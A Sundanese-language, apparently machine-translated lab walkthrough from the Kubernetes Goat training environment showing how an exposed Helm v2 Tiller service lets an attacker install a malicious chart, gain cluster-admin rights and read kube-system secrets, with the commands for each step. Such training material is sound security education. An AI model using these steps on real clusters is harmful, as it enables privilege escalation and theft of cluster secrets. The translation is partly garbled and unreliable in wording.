Helm mangrupikeun manajer pakét pikeun Kubernetes, sapertos kitu apt-get pikeun Ubuntu. Dina catetan ieu urang bakal ningali versi saméméhna tina Helm (v2) kalawan layanan tiller dipasang sacara standar, ngaliwatan nu urang bakal ngakses kluster.
Hayu urang nyiapkeun klaster; pikeun ngalakukeun ieu, jalankeun paréntah:
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
Démonstrasi
- Mun anjeun teu ngonpigurasikeun nanaon tambahan, Helm v2 dimimitian jasa anakan, nu boga RBAC kalawan hak administrator klaster pinuh.
- Saatos instalasi dina namespace
kube-systemnembongantiller-deploy, sarta ogé muka port 44134, kabeungkeut 0.0.0.0. Ieu tiasa dipariksa nganggo telnet.
$ telnet tiller-deploy.kube-system 44134
- Ayeuna anjeun tiasa nyambung ka jasa anakan. Kami bakal nganggo binér helm pikeun ngalaksanakeun operasi nalika komunikasi sareng jasa anakan:
$ helm --host tiller-deploy.kube-system:44134 version
- Hayu urang cobian kéngingkeun rusiah klaster Kubernetes tina namespace
kube-system:
$ kubectl get secrets -n kube-system
- Ayeuna urang tiasa ngadamel bagan urang sorangan, dimana urang bakal nyiptakeun peran sareng hak administrator sareng napelkeun peran ieu ka akun jasa standar. Nganggo token tina akun jasa ieu, kami nampi aksés pinuh kana klaster kami.
$ helm --host tiller-deploy.kube-system:44134 install /pwnchart
- Ayeuna iraha
pwnchartdeployed, akun layanan standar boga aksés administratif pinuh. Hayu urang pariksa deui kumaha carana ménta Rahasia tikube-system
kubectl get secrets -n kube-system
Kasuksésan palaksanaan naskah ieu gumantung kana kumaha tiller disebarkeun; kadang pangurus nyebarkeunana dina rohangan ngaran anu misah sareng hak husus anu béda. Helm 3 henteu rentan kana kerentanan sapertos kitu sabab ... teu aya patani di dinya.
Catetan panarjamah: Ngagunakeun kawijakan jaringan pikeun nyaring lalulintas dina klaster mantuan ngajaga ngalawan jenis ieu kerentanan.
sumber: www.habr.com